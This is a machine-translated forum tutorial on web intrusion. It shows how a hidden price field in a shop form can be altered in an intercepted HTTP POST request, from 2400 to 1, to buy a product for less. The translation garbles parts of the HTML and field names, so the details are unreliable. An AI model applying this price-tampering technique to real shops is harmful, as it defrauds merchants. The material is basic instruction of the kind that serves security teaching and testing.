Este artículo es un artículo espejo de traducción automática, por favor haga clic aquí para saltar al artículo original.

Vista: 12586|Respuesta: 0

[Tutorial de seguridad] Penetración de intrusiones: aplicación de cabeceras HTTP

[Copiar enlace]
Publicado en 7/2/2015 17:59:07 | | |

Sobre la aplicación de cabeceras HTTP

El encabezado http se usa comúnmente en el mecanismo de transmisión de sitios web, pero la mayoría de los principiantes en China no han notado este artículo; este artículo está dedicado solo a principiantes, el papel del encabezado http en el proceso de intrusión.

Tomemos la página de compra como ejemplo para analizar una pequeña parte del papel de los encabezados HTTP.

Primero, analicemos un formulario en la página de compras.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<tipo de entrada="oculto" nombre="precio" valor="449">

<input type="submit" value="Buy">

</form>

Durante el proceso de apertura, haz una captura de pantalla de su encabezado de mensaje http y échale un vistazo

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

cantidad=1&precio=2400

Aunque el campo de precio no se muestra en la página al abrir la página de compras, aún puede ser editado y utilizado por el usuario.

Hay dos formas de lograr la edición

1. Guarda el código fuente HTML para modificarlo y luego recárgalo en el navegador para ejecutarlo

2. Utilizar intercepción de proxy para modificar cabeceras HTTP (construcción de proxy en tool burp)

Tomemos como ejemplo la cabecera HTTP anterior
Antes del cambio
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

cantidad=1&precio=2400

Después del cambio
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

cantidad=1&precio=1


En la última línea, el precio tiene un valor de 2400 y si lo cambiamos a 1 podemos conseguir el iPhone 4S a un precio más barato.

Este artículo solo ofrece una idea de beneficios inesperados como la inyección de LDAP.




Anterior:Método de implementación de contraseñas para recuperación de contraseñas MySQL
Próximo:Inyección SQL para obtener la ruta completa del sitio web
Renuncia:
Todo el software, materiales de programación o artículos publicados por Code Farmer Network son únicamente para fines de aprendizaje e investigación; El contenido anterior no se utilizará con fines comerciales o ilegales; de lo contrario, los usuarios asumirán todas las consecuencias. La información de este sitio proviene de Internet, y las disputas de derechos de autor no tienen nada que ver con este sitio. Debes eliminar completamente el contenido anterior de tu ordenador en un plazo de 24 horas desde la descarga. Si te gusta el programa, por favor apoya el software genuino, compra el registro y obtén mejores servicios genuinos. Si hay alguna infracción, por favor contáctanos por correo electrónico.

Mail To:help@itsvse.com